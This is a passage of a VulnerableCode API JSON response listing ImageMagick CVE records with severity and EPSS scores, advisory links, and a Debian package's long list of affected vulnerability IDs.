"VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27755" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u6vb-tewy-fkda" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80038?format=api", "vulnerability_id": "VCID-u9gb-ppd4-3fd5", "summary": "ImageMagick: possible read or write in postscript files", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-39212.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-39212.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39212", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04593", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04844", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04668", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.0481", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04654", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04677", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04689", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04723", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04736", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04727", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04709", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04692", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.0466", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39212" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39212", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39212" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2009391", "reference_id": "2009391", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2009391" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=996588", "reference_id": "996588", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=996588" }, { "reference_url": "https://security.archlinux.org/AVG-2378", "reference_id": "AVG-2378", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-2378" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-39212" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u9gb-ppd4-3fd5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82023?format=api", "vulnerability_id": "VCID-ucfp-qqy4-jqdm", "summary": "ImageMagick: outside the range of representable values of type 'unsigned long long' at MagickCore/quantum-private.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27757.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27757.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27757", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31996", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32124", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32163", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31986", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32037", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32066", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3207", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32031", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31999", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32032", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3201", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31984", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31817", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27757" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27757", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27757" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894234", "reference_id": "1894234", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894234" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27757" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ucfp-qqy4-jqdm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81952?format=api", "vulnerability_id": "VCID-uwq6-h2du-dkdn", "summary": "ImageMagick: outside the range of representable values of type 'long' and signed integer overflow at MagickCore/quantize.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27754.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27754.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27754", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27754" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27754", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27754" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894231", "reference_id": "1894231", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894231" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27754" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": 